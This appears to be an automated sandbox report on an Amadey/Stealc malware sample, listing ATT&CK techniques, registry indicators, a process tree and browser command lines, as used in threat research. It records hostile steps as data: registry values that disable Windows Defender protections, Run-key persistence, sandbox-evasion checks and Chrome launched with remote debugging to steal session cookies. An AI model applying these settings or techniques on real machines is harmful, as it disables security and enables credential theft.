amadey | 967fec589e68cfc7d78b1f78bab62f2826a62c581ec88966e78dde076ccd7bd0

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	f69e93f11b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	f69e93f11b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	f69e93f11b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	f69e93f11b.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	f69e93f11b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	f69e93f11b.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

credential_access stealer

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1M26j7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3f60z.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2d902fdd78.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2n6965.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	c3a87ab7a9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	f69e93f11b.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe

Downloads MZ/PE file

Uses browser remote debugging 2 TTPs 8 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
3116	chrome.exe
5696	chrome.exe
5344	msedge.exe
5516	msedge.exe
5512	msedge.exe
3028	chrome.exe
2188	chrome.exe
2508	chrome.exe

Checks BIOS information in registry 2 TTPs 18 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1M26j7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	c3a87ab7a9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	c3a87ab7a9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f69e93f11b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f69e93f11b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2n6965.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3f60z.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2d902fdd78.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2n6965.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1M26j7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3f60z.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2d902fdd78.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	3f60z.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	skotes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	1M26j7.exe

Executes dropped EXE 10 IoCs

pid	Process
3884	f0A60.exe
3712	1M26j7.exe
4808	skotes.exe
2044	2n6965.exe
3920	3f60z.exe
2724	c3a87ab7a9.exe
5084	2d902fdd78.exe
5008	f69e93f11b.exe
1400	skotes.exe
5128	skotes.exe

Identifies Wine through registry keys 2 TTPs 9 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine	2d902fdd78.exe
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine	2n6965.exe
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine	c3a87ab7a9.exe
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine	1M26j7.exe
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine	3f60z.exe
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine	f69e93f11b.exe

Loads dropped DLL 1 IoCs

pid	Process
3920	3f60z.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	f69e93f11b.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	f69e93f11b.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	f0A60.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c3a87ab7a9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1005494001\\c3a87ab7a9.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2d902fdd78.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1005495001\\2d902fdd78.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f69e93f11b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1005497001\\f69e93f11b.exe"	skotes.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	967fec589e68cfc7d78b1f78bab62f2826a62c581ec88966e78dde076ccd7bd0.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

pid	Process
3712	1M26j7.exe
4808	skotes.exe
2044	2n6965.exe
3920	3f60z.exe
2724	c3a87ab7a9.exe
5084	2d902fdd78.exe
5008	f69e93f11b.exe
1400	skotes.exe
5128	skotes.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	1M26j7.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1484	5084	WerFault.exe	109

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c3a87ab7a9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2d902fdd78.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	967fec589e68cfc7d78b1f78bab62f2826a62c581ec88966e78dde076ccd7bd0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1M26j7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3f60z.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f0A60.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2n6965.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f69e93f11b.exe

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	3f60z.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	3f60z.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	2d902fdd78.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	2d902fdd78.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3468	timeout.exe

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133757880480972137"	chrome.exe

Suspicious behavior: EnumeratesProcesses 46 IoCs

pid	Process
3712	1M26j7.exe
3712	1M26j7.exe
4808	skotes.exe
4808	skotes.exe
2044	2n6965.exe
2044	2n6965.exe
3920	3f60z.exe
3920	3f60z.exe
3920	3f60z.exe
3920	3f60z.exe
2724	c3a87ab7a9.exe
2724	c3a87ab7a9.exe
5084	2d902fdd78.exe
5084	2d902fdd78.exe
5084	2d902fdd78.exe
5084	2d902fdd78.exe
5084	2d902fdd78.exe
5084	2d902fdd78.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
5008	f69e93f11b.exe
5008	f69e93f11b.exe
5008	f69e93f11b.exe
5008	f69e93f11b.exe
5008	f69e93f11b.exe
5084	2d902fdd78.exe
5084	2d902fdd78.exe
5084	2d902fdd78.exe
5084	2d902fdd78.exe
392	msedge.exe
392	msedge.exe
5344	msedge.exe
5344	msedge.exe
5328	msedge.exe
5328	msedge.exe
5328	msedge.exe
5328	msedge.exe
5328	msedge.exe
5328	msedge.exe
5328	msedge.exe
5328	msedge.exe
1400	skotes.exe
1400	skotes.exe
5128	skotes.exe
5128	skotes.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
5344	msedge.exe
5344	msedge.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3028	chrome.exe
Token: SeCreatePagefilePrivilege	3028	chrome.exe
Token: SeShutdownPrivilege	3028	chrome.exe
Token: SeCreatePagefilePrivilege	3028	chrome.exe
Token: SeShutdownPrivilege	3028	chrome.exe
Token: SeCreatePagefilePrivilege	3028	chrome.exe
Token: SeShutdownPrivilege	3028	chrome.exe
Token: SeCreatePagefilePrivilege	3028	chrome.exe
Token: SeShutdownPrivilege	3028	chrome.exe
Token: SeCreatePagefilePrivilege	3028	chrome.exe
Token: SeShutdownPrivilege	3028	chrome.exe
Token: SeCreatePagefilePrivilege	3028	chrome.exe
Token: SeDebugPrivilege	5008	f69e93f11b.exe
Token: SeShutdownPrivilege	3028	chrome.exe
Token: SeCreatePagefilePrivilege	3028	chrome.exe

Suspicious use of FindShellTrayWindow 52 IoCs

pid	Process
3712	1M26j7.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
5344	msedge.exe
5344	msedge.exe
5344	msedge.exe
5344	msedge.exe
5344	msedge.exe
5344	msedge.exe
5344	msedge.exe
5344	msedge.exe
5344	msedge.exe
5344	msedge.exe
5344	msedge.exe
5344	msedge.exe
5344	msedge.exe
5344	msedge.exe
5344	msedge.exe
5344	msedge.exe
5344	msedge.exe
5344	msedge.exe
5344	msedge.exe
5344	msedge.exe
5344	msedge.exe
5344	msedge.exe
5344	msedge.exe
5344	msedge.exe
5344	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2208 wrote to memory of 3884	2208	967fec589e68cfc7d78b1f78bab62f2826a62c581ec88966e78dde076ccd7bd0.exe	84
PID 2208 wrote to memory of 3884	2208	967fec589e68cfc7d78b1f78bab62f2826a62c581ec88966e78dde076ccd7bd0.exe	84
PID 2208 wrote to memory of 3884	2208	967fec589e68cfc7d78b1f78bab62f2826a62c581ec88966e78dde076ccd7bd0.exe	84
PID 3884 wrote to memory of 3712	3884	f0A60.exe	86
PID 3884 wrote to memory of 3712	3884	f0A60.exe	86
PID 3884 wrote to memory of 3712	3884	f0A60.exe	86
PID 3712 wrote to memory of 4808	3712	1M26j7.exe	88
PID 3712 wrote to memory of 4808	3712	1M26j7.exe	88
PID 3712 wrote to memory of 4808	3712	1M26j7.exe	88
PID 3884 wrote to memory of 2044	3884	f0A60.exe	89
PID 3884 wrote to memory of 2044	3884	f0A60.exe	89
PID 3884 wrote to memory of 2044	3884	f0A60.exe	89
PID 2208 wrote to memory of 3920	2208	967fec589e68cfc7d78b1f78bab62f2826a62c581ec88966e78dde076ccd7bd0.exe	97
PID 2208 wrote to memory of 3920	2208	967fec589e68cfc7d78b1f78bab62f2826a62c581ec88966e78dde076ccd7bd0.exe	97
PID 2208 wrote to memory of 3920	2208	967fec589e68cfc7d78b1f78bab62f2826a62c581ec88966e78dde076ccd7bd0.exe	97
PID 3920 wrote to memory of 1524	3920	3f60z.exe	98
PID 3920 wrote to memory of 1524	3920	3f60z.exe	98
PID 3920 wrote to memory of 1524	3920	3f60z.exe	98
PID 1524 wrote to memory of 3468	1524	cmd.exe	100
PID 1524 wrote to memory of 3468	1524	cmd.exe	100
PID 1524 wrote to memory of 3468	1524	cmd.exe	100
PID 4808 wrote to memory of 2724	4808	skotes.exe	103
PID 4808 wrote to memory of 2724	4808	skotes.exe	103
PID 4808 wrote to memory of 2724	4808	skotes.exe	103
PID 4808 wrote to memory of 5084	4808	skotes.exe	109
PID 4808 wrote to memory of 5084	4808	skotes.exe	109
PID 4808 wrote to memory of 5084	4808	skotes.exe	109
PID 4808 wrote to memory of 4384	4808	skotes.exe	110
PID 4808 wrote to memory of 4384	4808	skotes.exe	110
PID 4808 wrote to memory of 4384	4808	skotes.exe	110
PID 5084 wrote to memory of 3028	5084	2d902fdd78.exe	111
PID 5084 wrote to memory of 3028	5084	2d902fdd78.exe	111
PID 3028 wrote to memory of 780	3028	chrome.exe	112
PID 3028 wrote to memory of 780	3028	chrome.exe	112
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113
PID 3028 wrote to memory of 1928	3028	chrome.exe	113

C:\Users\Admin\AppData\Local\Temp\967fec589e68cfc7d78b1f78bab62f2826a62c581ec88966e78dde076ccd7bd0.exe
"C:\Users\Admin\AppData\Local\Temp\967fec589e68cfc7d78b1f78bab62f2826a62c581ec88966e78dde076ccd7bd0.exe"
1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2208
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\f0A60.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\f0A60.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3884
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1M26j7.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1M26j7.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:3712
  - - C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Adds Run key to start application
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4808
    - - C:\Users\Admin\AppData\Local\Temp\1005494001\c3a87ab7a9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1005494001\c3a87ab7a9.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2724
    - - C:\Users\Admin\AppData\Local\Temp\1005495001\2d902fdd78.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1005495001\2d902fdd78.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:5084
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
        6⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:3028
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffb2523cc40,0x7ffb2523cc4c,0x7ffb2523cc58
        7⤵
        
        PID:780
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,16552900340899272963,9888945694181116105,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1920 /prefetch:2
        7⤵
        
        PID:1928
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1908,i,16552900340899272963,9888945694181116105,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2184 /prefetch:3
        7⤵
        
        PID:4928
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2276,i,16552900340899272963,9888945694181116105,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2464 /prefetch:8
        7⤵
        
        PID:3044
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3196,i,16552900340899272963,9888945694181116105,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3208 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:2508
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3252,i,16552900340899272963,9888945694181116105,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3240 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:2188
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4248,i,16552900340899272963,9888945694181116105,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4524 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:3116
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4736,i,16552900340899272963,9888945694181116105,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4664 /prefetch:8
        7⤵
        
        PID:3000
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4752,i,16552900340899272963,9888945694181116105,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4800 /prefetch:8
        7⤵
        
        PID:4268
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4480,i,16552900340899272963,9888945694181116105,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4648 /prefetch:8
        7⤵
        
        PID:2148
        
